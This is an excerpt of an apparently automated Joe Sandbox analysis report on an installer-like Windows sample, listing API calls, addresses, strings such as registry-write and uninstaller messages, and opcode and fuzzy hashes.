                                                      • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                      • SetCursor.USER32(00000000), ref: 004042F6
                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                      • String ID: @%F$N$open
                                                      • API String ID: 3928313111-3849437375
                                                      • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                      • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                      • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                      • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                      APIs
                                                      • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                      • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                      • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                        • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                        • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                      • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                      • wsprintfA.USER32 ref: 00406B4D
                                                      • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                        • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                        • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                      • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                      • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                      • String ID: F$%s=%s$NUL$[Rename]
                                                      • API String ID: 565278875-1653569448
                                                      • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                      • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                      • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                      • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                      • DeleteObject.GDI32(?), ref: 004010F6
                                                      • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                      • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                      • SelectObject.GDI32(00000000,?), ref: 00401149
                                                      • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                      • DeleteObject.GDI32(?), ref: 0040116E
                                                      • EndPaint.USER32(?,?), ref: 00401177
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                      • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                      • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                      • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                      • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                      • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      Strings
                                                      • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                      • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                      • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                      • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                      • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                      • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CloseCreateValuewvsprintf
                                                      • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                      • API String ID: 1641139501-220328614
                                                      • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                      • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                      • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                      • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                      • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                      • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                      Strings
                                                      • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                      • String ID: created uninstaller: %d, "%s"
                                                      • API String ID: 3294113728-3145124454
                                                      • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                      • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                      • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                      • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                      APIs
                                                      • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                      • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                      • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                      • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                      • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                                      • API String ID: 3734993849-2769509956
                                                      • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                      • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                      • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                      • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                      • GetSysColor.USER32(00000000), ref: 00403E00
                                                      • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                      • SetBkMode.GDI32(?,?), ref: 00403E18
                                                      • GetSysColor.USER32(?), ref: 00403E2B
                                                      • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                      • DeleteObject.GDI32(?), ref: 00403E55
                                                      • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                      • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                      • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                      • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                      • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                      Strings
                                                      • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                      • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                      • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                      • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                      • API String ID: 1033533793-945480824
                                                      • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                      • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                      • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                      • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                      APIs
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
